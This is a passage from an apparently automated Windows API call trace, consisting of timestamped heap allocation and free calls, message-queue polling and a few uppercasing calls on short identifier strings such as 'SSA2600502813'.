hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0223.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c0d) returned 0x2a8a138 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0223.098] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.098] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0223.099] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0223.099] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c0d) returned 0x2a8a138 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0223.099] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.099] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0223.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0223.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0223.100] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5c0d) returned 0x2a95968 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0223.100] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0223.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0223.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0223.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0223.101] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.101] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0223.101] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0223.102] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0223.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0223.102] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0223.102] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0223.102] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.103] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.103] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.104] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0223.104] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0223.104] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0223.105] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0223.105] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0223.105] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.105] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0223.106] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0223.106] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0223.106] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.106] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0223.106] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0223.106] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0223.106] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a10 [0223.107] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0223.107] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0223.107] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0223.107] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | 